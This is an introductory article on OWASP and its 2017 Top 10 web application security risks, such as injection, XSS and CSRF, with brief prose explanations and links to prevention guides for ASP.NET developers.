OWASP stands for Open Web Application Security Project, which is a non-profit organization that provides unbiased guides, security best practices, tools and recommendations for building a secured web applications.
Security is one of the most important part of any application we develop and in a world where all the services are offered on World Wide Web, the web apps are the easy target for the attackers. OWASP maintains list of attacks on web applications here. It is responsibility of the developers to deliver code that have no identified security vulnerabilities. The OWASP guides and recommended practices are a starting point to understand the specifics of web security vulnerabilities and to deliver secure code.
OWASP Developer Guide
Read the OWASP secure coding practice guide here.
OWASP Top 10 Risks
OWASP identifies and releases the top 10 most critical web application security risks here over time to time. Though, most the vulnerabilities look very basic but they are the commonly found and most exploited vulnerabilities on the web applications based on statistics. The top 10 vulnerabilities released for the year 2017 are as follows.
-
Injection
-
Broken Authentication and Session Management
-
Cross-Site Scripting (XSS)
-
Broken Access Control
-
Security Misconfiguration
-
Sensitive Data Exposure
-
Insufficient Attack Protection
-
Cross-Site Request Forgery (CSRF)
-
Using Components with Known Vulnerabilities
-
Under protected APIs
Injection
Injection flaws are one of the most commonly found vulnerabilities in the web applications. They are SQL injection, LDAP and OS injection where the application or component may accept an untrusted data as input to make unintended actions on the application.
Read more about SQL Injection Attack and ways to prevent it in Asp.Net application here.
Broken Authentication and Session Management
The application authentication and session management may not properly implemented which may lead to attacker exploiting the application data and functions by unauthorized access.
Cross-Site Scripting (XSS)
This is again due to an application accepting untrusted data due to lack of validations on input where an attacker can insert a malicious scripts that execute an unintended operation when a victim access that page.
Read more about XSS attach and ways to preventing it in Asp.Net application here.
Broken Access Control
This is due to a bad implementation of authorization where the actions a user can perform is not properly enforced. This may lead to an attacker viewing, modifying sensitive data and perform unauthorized functions, etc.
Security Misconfiguration
The risk may occur when security settings of a software, OS, webservers are not properly configured or sometimes misconfigured or not patched regularly. Sometimes, leaving the default security settings for a software too can create a vulnerability which an attacker can take advantage of.
Sensitive Data Exposure
This will happen when the sensitive data like KYC information, payment information, etc. are not properly encrypted or exposed due to weak authorization rules. There should be proper error handling mechanisms and when the application fails it should not expose the technical error details which may help an attacker with additional information on application implementation.
Insufficient Attack Protection
The application should have some basic ability to detect and prevent common attacks. Sometimes, the application should include components to respond to an attack by blocking the request, raising alerts etc.
Cross-Site Request Forgery (CSRF)
Cross Site Request Forgery is done by executing a script that uses the victim’s identity to perform an action which the actual user (victim) is authorized to do.
Read What is XSRF or CSRF Attack? How to Prevent CSRF or XSRF in Asp.Net MVC? to know more about CSRF attack and ways to prevent them in Asp.Net MVC.
Using Components with Known Vulnerabilities
When an application uses a component or software that already has vulnerability then it may lead to some serious exploitations. These days we use many open source re-usable components and thus there are higher chances that an attacker who knows the implementation specifics can target your applications.
Under protected APIs
API’s are becoming an integral part of every application we develop. API’s with vulnerabilities can be easily exploited. So, proper security handling should be incorporated when delivering API’s in public domain to prevent attacks.
Recommended Reading
- Understanding Web Security Vulnerabilities and Preventing it in Web Applications
- OWASP Developer Guide
- OWASP .Net Project – For building .Net secured web applications
- OWASP WebGoat Project – Both Java and .Net sample insecure application with all web security vulnerabilities for understanding.